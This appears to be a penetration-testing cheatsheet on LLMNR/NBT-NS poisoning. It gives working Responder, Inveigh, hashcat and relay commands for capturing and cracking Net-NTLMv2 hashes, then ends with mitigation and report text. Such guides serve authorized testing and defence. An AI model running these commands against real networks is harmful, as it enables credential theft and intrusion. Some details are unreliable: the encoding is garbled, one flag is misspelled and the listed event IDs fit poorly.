π‘οΈ Methodology Checklist
- Start Responder:
sudo responder -I [IFACE] -wdv - Wait for LLMNR/NBT-NS requests (triggered by mistyped shares, failed DNS)
- Collect NTLMv2 hashes from Responder logs
- Crack hashes:
hashcat -m 5600 hashes.txt [wordlist] - Alternatively: relay with ntlmrelayx (requires SMB signing disabled targets)
- Windows alternative: run Inveigh from compromised Windows host
- Verify cracked credentials before escalation
π― Operational Context
Use when: On the internal network with no initial creds β poison LLMNR/NBT-NS to capture Net-NTLMv2 hashes from any host that broadcasts a name resolution request.
Think Dumber First: python Responder.py -I [IFACE] -w -d β just run it and wait. Hashes come in passively as users access network resources. Peak times: morning login (8-9am) and after lunch (1-2pm) when people reconnect mapped drives.
Skip when: LLMNR/NBT-NS is disabled via GPO β confirm first with nmap --script llmnr [SUBNET]; if no response, poisoning wonβt work.
β‘ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
sudo responder -I [IFACE] -A | Analyze mode β passive listen, no poisoning |
sudo responder -I [IFACE] -w -r -f | Active poisoning β capture NetNTLMv2 hashes |
hashcat -m 5600 captured_hash.txt rockyou.txt | Crack NetNTLMv2 hash (mode 5600) |
cat /usr/share/responder/logs/SMB-NTLMv2-SSP-[IP].txt | View captured hashes from Responder logs |
Import-Module .\Inveigh.ps1 | Load Inveigh (Windows equivalent of Responder) |
Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y | Start Inveigh poisoning (PowerShell) |
.\Inveigh.exe | Start InveighZero (C# version) |
GET NTLMV2UNIQUE | Inveigh console: show unique captured hashes |
GET NTLMV2USERNAMES | Inveigh console: show captured usernames + source IPs |
π¬ Deep Dive & Workflow
How LLMNR/NBT-NS Poisoning Works
Windows falls back to broadcast protocols when DNS fails:
- LLMNR β UDP 5355, link-local multicast
- NBT-NS β UDP 137, NetBIOS
The attack:
- Victim mistypes a share name (
\\printer01instead of\\print01) - DNS fails β victim broadcasts βWho knows
\\printer01?β via LLMNR/NBT-NS - Responder (attacker) replies βThatβs meβ
- Victim sends NetNTLMv2 hash to authenticate
- Attacker captures hash for offline cracking or relay
Critical: NetNTLMv2 hashes cannot be used for Pass-the-Hash directly β they must be cracked or relayed.
Responder (Linux) Workflow
# Phase 1: Analyze traffic first (safe, no disruption)
sudo responder -I eth0 -A
# Phase 2: Active poisoning
sudo responder -I eth0 -w -r -f
# -w: WPAD rogue proxy (effective when browsers auto-detect proxy settings)
# -r: Answer NetBIOS wredir suffix queries
# -f: Fingerprint remote host OS/version
# Phase 3: Crack
hashcat -m 5600 /usr/share/responder/logs/SMB-NTLMv2-SSP-*.txt /usr/share/wordlists/rockyou.txtLogs stored in /usr/share/responder/logs/ β format: MODULE-HASHTYPE-CLIENT_IP.txt
Port conflict check: Responder needs ports 80, 445, 53. Ensure nothing else is bound to them.
Inveigh (Windows)
Use when operating from a compromised Windows host or a client-provided Windows attack VM:
# PowerShell version
Import-Module .\Inveigh.ps1
Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y
# C# version (more stable)
.\Inveigh.exe
# Interactive console commands (press ESC to enter/exit)
GET NTLMV2UNIQUE # all unique hashes
GET NTLMV2USERNAMES # usernames + source IPs
GET CLEARTEXTUNIQUE # cleartext credentials (HTTP Basic Auth)Requires local admin to bind privileged ports (445, 80, 137).
Detection & Mitigation (for Reporting)
- Disable LLMNR: Group Policy β Computer Configuration β Admin Templates β Network β DNS Client β Turn OFF Multicast Name Resolution
- Disable NBT-NS: NIC β IPv4 Properties β Advanced β WINS β Disable NetBIOS over TCP/IP
- Monitor: UDP 5355, UDP 137 traffic; Event IDs 4697, 7045
π οΈ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Responder captures nothing | LLMNR/NBT-NS disabled by GPO | Check: nmap -sU -p 5355 [SUBNET] for LLMNR; if no response, pivot to other initial access |
| Hashes captured but NTLMv1 only | Older Windows version | NTLMv1 hashes crack differently; use mode 5500 for NTLMv1 in hashcat |
| Responder conflicts with local services | Port 80/443/53 already in use | Stop local services or use --lm --ntml --wpad to select only needed protocols |
| Hash captured but relay fails | SMB signing enabled on target | Check: nxc smb [TARGET] --gen-relay-list relay_targets.txt for unsigned hosts |
| Responder .db file not found | Wrong path | Hashes stored in /usr/share/responder/logs/; also printed to stdout in real time |
π Reporting Trigger
Finding Title: LLMNR/NBT-NS Poisoning Captures Net-NTLMv2 Hashes Impact: LLMNR/NBT-NS poisoning passively captures authentication hashes from any network user who attempts to access a non-existent or mistyped network resource, providing Net-NTLMv2 hashes for offline cracking or direct relay without any active exploitation. Root Cause: LLMNR and NBT-NS enabled by default on Windows systems, allowing any network observer to respond to broadcast name resolution queries and capture the resulting authentication. Recommendation: Disable LLMNR via GPO (Computer Configuration > Admin Templates > Network > DNS Client > Turn off multicast name resolution). Disable NBT-NS (Network Adapter > TCP/IP > WINS > Disable NetBIOS). Enable SMB signing to prevent relay attacks.